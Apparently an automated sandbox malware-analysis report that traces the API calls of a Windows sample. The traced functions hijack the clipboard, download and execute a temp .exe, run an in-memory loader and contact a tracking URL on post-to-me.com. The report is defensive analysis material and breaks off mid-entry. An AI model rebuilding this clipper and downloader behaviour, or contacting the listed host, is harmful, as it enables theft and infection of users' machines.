CreateFileW 64312->64354 64314 43d318 64315 43d322 GetLastError 64314->64315 64319 43d267 64314->64319 64355 42eaa3 20 API calls __dosmaperr 64315->64355 64317 43d32e 64356 4398a0 21 API calls 2 library calls 64317->64356 64319->64287 64320->64258 64321->64268 64322->64260 64323->64268 64324->64261 64325->64268 64326->64267 64327->64269 64329 43979a ___BuildCatchObject 64328->64329 64357 42e3fd EnterCriticalSection 64329->64357 64331 4397c6 64361 43956d 21 API calls 3 library calls 64331->64361 64332 4397a1 64332->64331 64336 439834 EnterCriticalSection 64332->64336 64338 4397e8 64332->64338 64334 439811 std::_Locinfo::_Locinfo_dtor 64334->64280 64336->64338 64339 439841 LeaveCriticalSection 64336->64339 64337 4397cb 64337->64338 64362 4396b4 EnterCriticalSection 64337->64362 64358 439897 64338->64358 64339->64332 64341->64290 64342->64293 64343->64287 64344->64286 64345->64293 64346->64301 64347->64293 64348->64297 64349->64305 64350->64302 64351->64304 64352->64308 64353->64319 64354->64314 64355->64317 64356->64319 64357->64332 64363 42e445 LeaveCriticalSection 64358->64363 64360 43989e 64360->64334 64361->64337 64362->64338 64363->64360 64364 43411a 64365 434126 ___BuildCatchObject 64364->64365 64366 434132 64365->64366 64367 434149 64365->64367 64398 42ead9 20 API calls __dosmaperr 64366->64398 64377 42cb0f EnterCriticalSection 64367->64377 64370 434159 64378 434196 64370->64378 64371 434137 64399 42a5ad 26 API calls _Deallocate 64371->64399 64374 434165 64400 43418c LeaveCriticalSection __fread_nolock 64374->64400 64376 434142 std::_Locinfo::_Locinfo_dtor 64377->64370 64379 4341a4 64378->64379 64380 4341be 64378->64380 64411 42ead9 20 API calls __dosmaperr 64379->64411 64401 432918 64380->64401 64383 4341a9 64412 42a5ad 26 API calls _Deallocate 64383->64412 64384 4341c7 64408 4347e3 64384->64408 64388 4342cb 64390 4342d8 64388->64390 64394 43427e 64388->64394 64389 43424f 64392 43426c 64389->64392 64389->64394 64414 42ead9 20 API calls __dosmaperr 64390->64414 64413 4344af 31 API calls 4 library calls 64392->64413 64395 4341b4 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 64394->64395 64415 43432b 30 API calls 2 library calls 64394->64415 64395->64374 64396 434276 64396->64395 64398->64371 64399->64376 64400->64376 64402 432924 64401->64402 64403 432939 64401->64403 64416 42ead9 20 API calls __dosmaperr 64402->64416 64403->64384 64405 432929 64417 42a5ad 26 API calls _Deallocate 64405->64417 64407 432934 64407->64384 64418 434660 64408->64418 64410 4341e3 64410->64388 64410->64389 64410->64395 64411->64383 64412->64395 64413->64396 64414->64395 64415->64395 64416->64405 64417->64407 64419 43466c ___BuildCatchObject 64418->64419 64420 434674 64419->64420 64421 43468c 64419->64421 64453 42eac6 20 API calls __dosmaperr 64420->64453 64423 434740 64421->64423 64428 4346c4 64421->64428 64458 42eac6 20 API calls __dosmaperr 64423->64458 64424 434679 64454 42ead9 20 API calls __dosmaperr 64424->64454 64427 434745 64459 42ead9 20 API calls __dosmaperr 64427->64459 64443 4396b4 EnterCriticalSection 64428->64443 64429 434681 std::_Locinfo::_Locinfo_dtor 64429->64410 64432 43474d 64460 42a5ad 26 API calls _Deallocate 64432->64460 64433 4346ca 64435 434703 64433->64435 64436 4346ee 64433->64436 64444 434765 64435->64444 64455 42ead9 20 API calls __dosmaperr 64436->64455 64439 4346f3 64456 42eac6 20 API calls __dosmaperr 64439->64456 64440 4346fe 64457 434738 LeaveCriticalSection __wsopen_s 64440->64457 64443->64433 64461 439931 64444->64461 64446 434777 64447 434790 SetFilePointerEx 64446->64447 64448 43477f 64446->64448 64450 434784 64447->64450 64451 4347a8 GetLastError 64447->64451 64474 42ead9 20 API calls __dosmaperr 64448->64474 64450->64440 64475 42eaa3 20 API calls __dosmaperr 64451->64475 64453->64424 64454->64429 64455->64439 64456->64440 64457->64429 64458->64427 64459->64432 64460->64429 64462 43993e 64461->64462 64464 439953 64461->64464 64476 42eac6 20 API calls __dosmaperr 64462->64476 64468 439978 64464->64468 64478 42eac6 20 API calls __dosmaperr 64464->64478 64465 439943 64477 42ead9 20 API calls __dosmaperr 64465->64477 64468->64446 64469 439983 64479 42ead9 20 API calls __dosmaperr 64469->64479 64470 43994b 64470->64446 64472 43998b 64480 42a5ad 26 API calls _Deallocate 64472->64480 64474->64450 64475->64450 64476->64465 64477->64470 64478->64469 64479->64472 64480->64470 64481 4023ab 64482 402572 PostQuitMessage 64481->64482 64483 4023bf 64481->64483 64485 402570 64482->64485 64484 4023c6 DefWindowProcW 64483->64484 64486 4023dd 64483->64486 64484->64485 64486->64485 64487 402a05 167 API calls 64486->64487 64487->64485 64488 40fc1c 64489 40fc28 ___BuildCatchObject 64488->64489 64517 410009 64489->64517 64491 40fc2f 64492 40fd82 64491->64492 64495 40fc59 64491->64495 64538 4104e3 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 64492->64538 64494 40fd89 64539 42ffd9 28 API calls _Atexit 64494->64539 64503 40fc98 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 64495->64503 64532 42fcfe 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 64495->64532 64497 40fd8f 64540 42ff8b 28 API calls _Atexit 64497->64540 64500 40fc72 64502 40fc78 64500->64502 64533 42fca2 5 API calls __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 64500->64533 64501 40fd97 64505 40fcf9 64503->64505 64534 42a376 167 API calls 4 library calls 64503->64534 64528 4105fd 64505->64528 64508 40fcff 64509 40fd14 64508->64509 64535 410633 GetModuleHandleW 64509->64535 64511 40fd1b 64511->64494 64512 40fd1f 64511->64512 64513 40fd28 64512->64513 64536 42ff7c 28 API calls _Atexit 64512->64536 64537 410198 13 API calls 2 library calls 64513->64537 64516 40fd30 64516->64502 64518 410012 64517->64518 64541 41078b IsProcessorFeaturePresent 64518->64541 64520 41001e 64542 428837 10 API calls 3 library calls 64520->64542 64522 410023 64523 410027 64522->64523 64543 4317b1 IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 64522->64543 64523->64491 64525 410030 64526 41003e 64525->64526 64544 428860 8 API calls 3 library calls 64525->64544 64526->64491 64545 426840 64528->64545 64531 410623 64531->64508 64532->64500 64533->64503 64534->64505 64535->64511 64536->64513 64537->64516 64538->64494 64539->64497 64540->64501 64541->64520 64542->64522 64543->64525 64544->64523 64546 410610 GetStartupInfoW 64545->64546 64546->64531 64547 4332ee 64548 4332fb 64547->64548 64552 433313 64547->64552 64597 42ead9 20 API calls __dosmaperr 64548->64597 64550 433300 64598 42a5ad 26 API calls _Deallocate 64550->64598 64553 43336e 64552->64553 64561 43330b 64552->64561 64599 434cdd 21 API calls 2 library calls 64552->64599 64555 432918 __fread_nolock 26 API calls 64553->64555 64556 433386 64555->64556 64567 432e26 64556->64567 64558 43338d 64559 432918 __fread_nolock 26 API calls 64558->64559 64558->64561 64560 4333b9 64559->64560 64560->64561 64562 432918 __fread_nolock 26 API calls 64560->64562 64563 4333c7 64562->64563 64563->64561 64564 432918 __fread_nolock 26 API calls 64563->64564 64565 4333d7 64564->64565 64566 432918 __fread_nolock 26 API calls 64565->64566 64566->64561 64568 432e32 ___BuildCatchObject 64567->64568 64569 432e52 64568->64569 64570 432e3a 64568->64570 64571 432f18 64569->64571 64575 432e8b 64569->64575 64666 42eac6 20 API calls __dosmaperr 64570->64666 64673 42eac6 20 API calls __dosmaperr 64571->64673 64574 432e3f 64667 42ead9 20 API calls __dosmaperr 64574->64667 64578 432e9a 64575->64578 64579 432eaf 64575->64579 64576 432f1d 64674 42ead9 20 API calls __dosmaperr 64576->64674 64668 42eac6 20 API calls __dosmaperr 64578->64668 64600 4396b4 EnterCriticalSection 64579->64600 64583 432ea7 64675 42a5ad 26 API calls _Deallocate 64583->64675 64584 432e9f 64669 42ead9 20 API calls __dosmaperr 64584->64669 64585 432eb5 64588 432ed1 64585->64588 64589 432ee6 64585->64589 64586 432e47 std::_Locinfo::_Locinfo_dtor 64586->64558 64670 42ead9 20 API calls __dosmaperr 64588->64670 64601 432f39 64589->64601 64593 432ee1 64672 432f10 LeaveCriticalSection __wsopen_s 64593->64672 64594 432ed6 64671 42eac6 20 API calls __dosmaperr 64594->64671 64597->64550 64598->64561 64599->64553 64600->64585 64602 432f63 64601->64602 64603 432f4b 64601->64603 64605 4332cd 64602->64605 64610 432fa8 64602->64610 64685 42eac6 20 API calls __dosmaperr 64603->64685 64703 42eac6 20 API calls __dosmaperr 64605->64703 64606 432f50 64686 42ead9 20 API calls __dosmaperr 64606->64686 64609 4332d2 64704 42ead9 20 API calls __dosmaperr 64609->64704 64612 432fb3 64610->64612 64613 432f58 64610->64613 64617 432fe3 64610->64617 64687 42eac6 20 API calls __dosmaperr 64612->64687 64613->64593 64614 432fc0 64705 42a5ad 26 API calls _Deallocate 64614->64705 64616 432fb8 64688 42ead9 20 API calls __dosmaperr 64616->64688 64620 432ffc 64617->64620 64621 433022 64617->64621 64622 43303e 64617->64622 64620->64621 64626 433009 64620->64626 64689 42eac6 20 API calls __dosmaperr 64621->64689 64692 4336b7 21 API calls 3 library calls 64622->64692 64625 433027 64690 42ead9 20 API calls __dosmaperr 64625->64690 64676 43d375 64626->64676 64627 433055 64630 43347a _free 20 API calls 64627->64630 64633 43305e 64630->64633 64631 4331a7 64634 43321d 64631->64634 64638 4331c0 GetConsoleMode 64631->64638 64632 43302e 64691 42a5ad 26 API calls _Deallocate 64632->64691 64636 43347a _free 20 API calls 64633->64636 64637 433221 ReadFile 64634->64637 64640 433065 64636->64640 64641 433295 GetLastError 64637->64641 64642 43323b 64637->64642 64638->64634 64639 4331d1 64638->64639 64639->64637 64643 4331d7 ReadConsoleW 64639->64643 64644 43308a 64640->64644 64645 43306f 64640->64645 64646 4332a2 64641->64646 64647 4331f9 64641->64647 64642->64641 64648 433212 64642->64648 64643->64648 64649 4331f3 GetLastError 64643->64649 64695 4347fe 64644->64695 64693 42ead9 20 API calls __dosmaperr 64645->64693 64701 42ead9 20 API calls __dosmaperr 64646->64701 64663 433039 __fread_nolock 64647->64663 64698 42eaa3 20 API calls __dosmaperr 64647->64698 64658 433260 64648->64658 64659 433277 64648->64659 64648->64663 64649->64647 64650 43347a _free 20 API calls 64650->64613 64655 433074 64694 42eac6 20 API calls __dosmaperr 64655->64694 64656 4332a7 64702 42eac6 20 API calls __dosmaperr 64656->64702 64699 432c55 31 API calls 2 library calls 64658->64699 64662 43328e 64659->64662 64659->64663 64700 432a95 29 API calls __fread_nolock 64662->64700 64663->64650 64665 433293 64665->64663 64666->64574 64667->64586 64668->64584 64669->64583 64670->64594 64671->64593 64672->64586 64673->64576 64674->64583 64675->64586 64677 43d382 64676->64677 64678 43d38f 64676->64678 64706 42ead9 20 API calls __dosmaperr 64677->64706 64680 43d39b 64678->64680 64707 42ead9 20 API calls __dosmaperr 64678->64707 64680->64631 64682 43d387 64682->64631 64683 43d3bc 64708 42a5ad 26 API calls _Deallocate 64683->64708 64685->64606 64686->64613 64687->64616 64688->64614 64689->64625 64690->64632 64691->64663 64692->64627 64693->64655 64694->64663 64696 434765 __fread_nolock 28 API calls 64695->64696 64697 434814 64696->64697 64697->64626 64698->64663 64699->64663 64700->64665 64701->64656 64702->64663 64703->64609 64704->64614 64705->64613 64706->64682 64707->64683 64708->64682 64709 2c0d9de 64710 2c0d9ed 64709->64710 64713 2c0e17e 64710->64713 64714 2c0e199 64713->64714 64715 2c0e1a2 CreateToolhelp32Snapshot 64714->64715 64716 2c0e1be Module32First 64714->64716 64715->64714 64715->64716 64717 2c0d9f6 64716->64717 64718 2c0e1cd 64716->64718 64720 2c0de3d 64718->64720 64721 2c0de68 64720->64721 64722 2c0deb1 64721->64722 64723 2c0de79 VirtualAlloc 64721->64723 64722->64722 64723->64722 64724 402bbe RegCreateKeyExW 64725 402c00 64724->64725 64726 402bec RegSetValueExW 64724->64726 64727 402c05 RegCloseKey 64725->64727 64728 402c0e 64725->64728 64726->64725 64727->64728

                                                      Executed Functions

                                                      Function 004016E3 Relevance: 29.9, APIs: 16, Strings: 1, Instructions: 150clipboardsleepmemoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 004016EA
                                                      • Sleep.KERNEL32(00001541,0000004C), ref: 004016F4
                                                        • Part of subcall function 0040CC26: _strlen.LIBCMT ref: 0040CC3D
                                                      • OpenClipboard.USER32(00000000), ref: 00401721
                                                      • GetClipboardData.USER32(00000001), ref: 00401731
                                                      • GlobalLock.KERNEL32(00000000), ref: 00401740
                                                      • _strlen.LIBCMT ref: 0040174D
                                                      • _strlen.LIBCMT ref: 0040177C
                                                      • _strlen.LIBCMT ref: 004018C0
                                                      • EmptyClipboard.USER32 ref: 004018D6
                                                      • GlobalAlloc.KERNEL32(00000002,00000001,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 004018E3
                                                      • GlobalLock.KERNEL32(00000000), ref: 00401901
                                                      • GlobalUnlock.KERNEL32(00000000), ref: 0040190D
                                                      • SetClipboardData.USER32(00000001,00000000), ref: 00401916
                                                      • GlobalFree.KERNEL32(00000000), ref: 0040191D
                                                      • CloseClipboard.USER32 ref: 00401941
                                                      • Sleep.KERNEL32(000002D2), ref: 0040194C
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ClipboardGlobal$_strlen$DataLockSleep$AllocCloseEmptyFreeH_prolog3_OpenUnlock
                                                      • String ID: i
                                                      • API String ID: 1583243082-3865851505
                                                      • Opcode ID: 17d1fe9636891e7ab7a636a0232af5e3529bcbc6d572e399a941ee14b8431c0b
                                                      • Instruction ID: acef96f15b3fe231bab0a23a483f997ef62453455430a41aa2040eeb50028078
                                                      • Opcode Fuzzy Hash: 17d1fe9636891e7ab7a636a0232af5e3529bcbc6d572e399a941ee14b8431c0b
                                                      • Instruction Fuzzy Hash: 8351F631C00344DAE711DB64ED46BAD7764FF2A306F00523AE801722B3EB749A85C76D
                                                      Function 00402A05 Relevance: 28.1, APIs: 13, Strings: 3, Instructions: 134networkfilesynchronizationCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402A28
                                                      • InternetOpenUrlW.WININET(00000000,0045D820,00000000,00000000,00000000,00000000), ref: 00402A3E
                                                      • GetTempPathW.KERNEL32(00000105,?), ref: 00402A5A
                                                      • GetTempFileNameW.KERNEL32(?,00000000,00000000,?), ref: 00402A70
                                                      • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000), ref: 00402AA9
                                                      • InternetReadFile.WININET(00000000,?,00000400,00000000), ref: 00402AE5
                                                      • WriteFile.KERNEL32(00000000,?,00000000,?,00000000), ref: 00402B02
                                                      • CloseHandle.KERNEL32(00000000), ref: 00402B18
                                                      • ShellExecuteExW.SHELL32(?), ref: 00402B79
                                                      • WaitForSingleObject.KERNEL32(?,00008000), ref: 00402B8E
                                                      • CloseHandle.KERNEL32(?), ref: 00402B9A
                                                      • InternetCloseHandle.WININET(00000000), ref: 00402BA3
                                                      • InternetCloseHandle.WININET(00000000), ref: 00402BA6
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Internet$CloseFileHandle$OpenTemp$CreateExecuteNameObjectPathReadShellSingleWaitWrite
                                                      • String ID: .exe$<$ShareScreen
                                                      • API String ID: 3323492106-493228180
                                                      • Opcode ID: fad9fd4f4bba5414a44c3c39901aae32f2f0ecd744b7d4f48afe0ae2e52c8d25
                                                      • Instruction ID: 435bcfbe32f51655d878697dd8351b2d9b102cba8eaff0ca6adad6bfe9ceff32
                                                      • Opcode Fuzzy Hash: fad9fd4f4bba5414a44c3c39901aae32f2f0ecd744b7d4f48afe0ae2e52c8d25
                                                      • Instruction Fuzzy Hash: 5141537190021CAEEB209F509D85FEA77BCFF05745F0080F6A549E2190DE749E858FA4
                                                      Function 02C0E17E Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                      Download Yara Rule
                                                      APIs
                                                      • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02C0E1A6
                                                      • Module32First.KERNEL32(00000000,00000224), ref: 02C0E1C6
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091760416.0000000002C0D000.00000040.00000020.00020000.00000000.sdmp, Offset: 02C0D000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_2c0d000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CreateFirstModule32SnapshotToolhelp32
                                                      • String ID:
                                                      • API String ID: 3833638111-0
                                                      • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                      • Instruction ID: 9eb2d1d829b8c1eb20b6d91b1fe7e387ac693b7381752163faaa00353561c0ac
                                                      • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                      • Instruction Fuzzy Hash: 90F096321407146FE7243BF59CCCBAE76E8AF89624F100928E652914C1DB70ED458A61
                                                      Function 0043D04C Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 74 43d04c-43d07c call 43cdaf 77 43d097-43d0a3 call 43978e 74->77 78 43d07e-43d089 call 42eac6 74->78 83 43d0a5-43d0ba call 42eac6 call 42ead9 77->83 84 43d0bc-43d105 call 43cd1a 77->84 85 43d08b-43d092 call 42ead9 78->85 83->85 94 43d172-43d17b GetFileType 84->94 95 43d107-43d110 84->95 92 43d36e-43d374 85->92 96 43d1c4-43d1c7 94->96 97 43d17d-43d1ae GetLastError call 42eaa3 CloseHandle 94->97 99 43d112-43d116 95->99 100 43d147-43d16d GetLastError call 42eaa3 95->100 103 43d1d0-43d1d6 96->103 104 43d1c9-43d1ce 96->104 97->85 111 43d1b4-43d1bf call 42ead9 97->111 99->100 105 43d118-43d145 call 43cd1a 99->105 100->85 108 43d1da-43d228 call 4396d7 103->108 109 43d1d8 103->109 104->108 105->94 105->100 116 43d22a-43d236 call 43cf2b 108->116 117 43d238-43d25c call 43cacd 108->117 109->108 111->85 116->117 123 43d260-43d26a call 4335dd 116->123 124 43d26f-43d2b2 117->124 125 43d25e 117->125 123->92 127 43d2d3-43d2e1 124->127 128 43d2b4-43d2b8 124->128 125->123 131 43d2e7-43d2eb 127->131 132 43d36c 127->132 128->127 130 43d2ba-43d2ce 128->130 130->127 131->132 133 43d2ed-43d320 CloseHandle call 43cd1a 131->133 132->92 136 43d322-43d34e GetLastError call 42eaa3 call 4398a0 133->136 137 43d354-43d368 133->137 136->137 137->132
                                                      APIs
                                                        • Part of subcall function 0043CD1A: CreateFileW.KERNEL32(00000000,00000000,?,0043D0F5,?,?,00000000,?,0043D0F5,00000000,0000000C), ref: 0043CD37
                                                      • GetLastError.KERNEL32 ref: 0043D160
                                                      • __dosmaperr.LIBCMT ref: 0043D167
                                                      • GetFileType.KERNEL32(00000000), ref: 0043D173
                                                      • GetLastError.KERNEL32 ref: 0043D17D
                                                      • __dosmaperr.LIBCMT ref: 0043D186
                                                      • CloseHandle.KERNEL32(00000000), ref: 0043D1A6
                                                      • CloseHandle.KERNEL32(?), ref: 0043D2F0
                                                      • GetLastError.KERNEL32 ref: 0043D322
                                                      • __dosmaperr.LIBCMT ref: 0043D329
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                      • String ID: H
                                                      • API String ID: 4237864984-2852464175
                                                      • Opcode ID: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                      • Instruction ID: 9ea47a8c838bfa0642fa58bf6b528ca3bb2f39bbe3325b50c92cc96ec35dc4ac
                                                      • Opcode Fuzzy Hash: 333ff1eee16b6be64793bd318ad3fa05ede6171504cd334b681c7e0d8fb5623c
                                                      • Instruction Fuzzy Hash: 73A12432E141089FDF19AF68EC917AE7BA0AF0A324F14115EE8169B3D1D7389902C75A
                                                      Function 00432F39 Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 142 432f39-432f49 143 432f63-432f65 142->143 144 432f4b-432f5e call 42eac6 call 42ead9 142->144 146 432f6b-432f71 143->146 147 4332cd-4332da call 42eac6 call 42ead9 143->147 160 4332e5 144->160 146->147 150 432f77-432fa2 146->150 165 4332e0 call 42a5ad 147->165 150->147 153 432fa8-432fb1 150->153 156 432fb3-432fc6 call 42eac6 call 42ead9 153->156 157 432fcb-432fcd 153->157 156->165 158 432fd3-432fd7 157->158 159 4332c9-4332cb 157->159 158->159 163 432fdd-432fe1 158->163 164 4332e8-4332ed 159->164 160->164 163->156 167 432fe3-432ffa 163->167 165->160 171 433017-433020 167->171 172 432ffc-432fff 167->172 175 433022-433039 call 42eac6 call 42ead9 call 42a5ad 171->175 176 43303e-433048 171->176 173 433001-433007 172->173 174 433009-433012 172->174 173->174 173->175 179 4330b3-4330cd 174->179 204 433200 175->204 177 43304a-43304c 176->177 178 43304f-43306d call 4336b7 call 43347a * 2 176->178 177->178 212 43308a-4330b0 call 4347fe 178->212 213 43306f-433085 call 42ead9 call 42eac6 178->213 181 4330d3-4330e3 179->181 182 4331a1-4331aa call 43d375 179->182 181->182 185 4330e9-4330eb 181->185 195 43321d 182->195 196 4331ac-4331be 182->196 185->182 189 4330f1-433117 185->189 189->182 193 43311d-433130 189->193 193->182 198 433132-433134 193->198 200 433221-433239 ReadFile 195->200 196->195 201 4331c0-4331cf GetConsoleMode 196->201 198->182 205 433136-433161 198->205 207 433295-4332a0 GetLastError 200->207 208 43323b-433241 200->208 201->195 203 4331d1-4331d5 201->203 203->200 209 4331d7-4331f1 ReadConsoleW 203->209 210 433203-43320d call 43347a 204->210 205->182 211 433163-433176 205->211 214 4332a2-4332b4 call 42ead9 call 42eac6 207->214 215 4332b9-4332bc 207->215 208->207 216 433243 208->216 217 4331f3 GetLastError 209->217 218 433212-43321b 209->218 210->164 211->182 222 433178-43317a 211->222 212->179 213->204 214->204 219 4332c2-4332c4 215->219 220 4331f9-4331ff call 42eaa3 215->220 226 433246-433258 216->226 217->220 218->226 219->210 220->204 222->182 231 43317c-43319c 222->231 226->210 228 43325a-43325e 226->228 235 433260-433270 call 432c55 228->235 236 433277-433282 228->236 231->182 247 433273-433275 235->247 241 433284 call 432da5 236->241 242 43328e-433293 call 432a95 236->242 248 433289-43328c 241->248 242->248 247->210 248->247
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                      • Instruction ID: 771be544e8584462915c4c8bf235ce765a173336d99d9e07edf5531b4c9f0108
                                                      • Opcode Fuzzy Hash: bf5b903c5d4d7d43f3395e6d2b0615cff82c67b54ffa341e922cfa30cc62cd86
                                                      • Instruction Fuzzy Hash: 39C12670E04249AFDF11DFAAD841BAF7BB0BF0D316F14119AE81597392C3789A41CB69
                                                      Function 046D003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515memoryCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      • Executed
                                                      • Not Executed
                                                      control_flow_graph 250 46d003c-46d0047 251 46d004c-46d0263 call 46d0a3f call 46d0e0f call 46d0d90 VirtualAlloc 250->251 252 46d0049 250->252 267 46d028b-46d0292 251->267 268 46d0265-46d0289 call 46d0a69 251->268 252->251 270 46d02a1-46d02b0 267->270 272 46d02ce-46d03c2 VirtualProtect call 46d0cce call 46d0ce7 268->272 270->272 273 46d02b2-46d02cc 270->273 279 46d03d1-46d03e0 272->279 273->270 280 46d0439-46d04b8 VirtualFree 279->280 281 46d03e2-46d0437 call 46d0ce7 279->281 282 46d04be-46d04cd 280->282 283 46d05f4-46d05fe 280->283 281->279 286 46d04d3-46d04dd 282->286 287 46d077f-46d0789 283->287 288 46d0604-46d060d 283->288 286->283 292 46d04e3-46d0505 LoadLibraryA 286->292 290 46d078b-46d07a3 287->290 291 46d07a6-46d07b0 287->291 288->287 293 46d0613-46d0637 288->293 290->291 294 46d086e-46d08be LoadLibraryA 291->294 295 46d07b6-46d07cb 291->295 296 46d0517-46d0520 292->296 297 46d0507-46d0515 292->297 298 46d063e-46d0648 293->298 302 46d08c7-46d08f9 294->302 299 46d07d2-46d07d5 295->299 300 46d0526-46d0547 296->300 297->300 298->287 301 46d064e-46d065a 298->301 303 46d0824-46d0833 299->303 304 46d07d7-46d07e0 299->304 305 46d054d-46d0550 300->305 301->287 306 46d0660-46d066a 301->306 307 46d08fb-46d0901 302->307 308 46d0902-46d091d 302->308 314 46d0839-46d083c 303->314 309 46d07e4-46d0822 304->309 310 46d07e2 304->310 311 46d0556-46d056b 305->311 312 46d05e0-46d05ef 305->312 313 46d067a-46d0689 306->313 307->308 309->299 310->303 315 46d056d 311->315 316 46d056f-46d057a 311->316 312->286 317 46d068f-46d06b2 313->317 318 46d0750-46d077a 313->318 314->294 319 46d083e-46d0847 314->319 315->312 321 46d057c-46d0599 316->321 322 46d059b-46d05bb 316->322 323 46d06ef-46d06fc 317->323 324 46d06b4-46d06ed 317->324 318->298 325 46d0849 319->325 326 46d084b-46d086c 319->326 333 46d05bd-46d05db 321->333 322->333 327 46d06fe-46d0748 323->327 328 46d074b 323->328 324->323 325->294 326->314 327->328 328->313 333->305
                                                      APIs
                                                      • VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 046D024D
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4091971836.00000000046D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 046D0000, based on PE: false
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_46d0000_6X4BIzTTBR.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: AllocVirtual
                                                      • String ID: cess$kernel32.dll
                                                      • API String ID: 4275171209-1230238691
                                                      • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                      • Instruction ID: 04d26f88f921edafd9078e74009a3848e0a5ea8b4592904e8189e6b27c8a28e5
                                                      • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                      • Instruction Fuzzy Hash: 5A525974E01229DFDB64CF58C984BA8BBB1BF09304F1480D9E94DAB351EB30AA85DF14
                                                      Function 00402C15 Relevance: 12.4, APIs: 4, Strings: 3, Instructions: 185networkCOMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      • InternetOpenW.WININET(ShareScreen,00000000,00000000,00000000,00000000), ref: 00402C38
                                                        • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010C1
                                                        • Part of subcall function 004010BA: _wcslen.LIBCMT ref: 004010DD
                                                      • InternetOpenUrlW.WININET(00000000,?,00000000,00000000,00000000,00000000), ref: 00402E50
                                                      • InternetCloseHandle.WININET(00000000), ref: 00402E61
                                                      • InternetCloseHandle.WININET(00000000), ref: 00402E64
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000000.00000002.4090424206.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_0_2_400000_6X4BIzTTBR.jbxd
                                                      Similarity
                                                      • API ID: Internet$CloseHandleOpen_wcslen
                                                      • String ID: &cc=DE$ShareScreen$https://post-to-me.com/track_prt.php?sub=
                                                      • API String ID: 3067768807-1501832161
                                                      • Opcode ID: 0fb28128169c721122051566bee59eb9950ac0eccb46e1d2827a4400177e3e4a
                                                      • Instruction ID: 7046a9f85a47caeeee545fc214d33fb705a5988e90a24de57e131be2d788241c
                                                      • Opcode Fuzzy Hash: 0fb28128169c721122051566bee59eb9950ac0eccb46e1d2827a4400177e3e4a
                                                      • Instruction Fuzzy Hash: 80517295E65344A8E320EBB0BC56B323378EF58752F10543BE524CB2F2E3B19A44875E
                                                      Function 004051E6 Relevance: 9.1, APIs: 6, Instructions: 82COMMON
                                                      Download Yara Rule

                                                      Control-flow Graph

                                                      APIs
                                                      Memory Dump Source
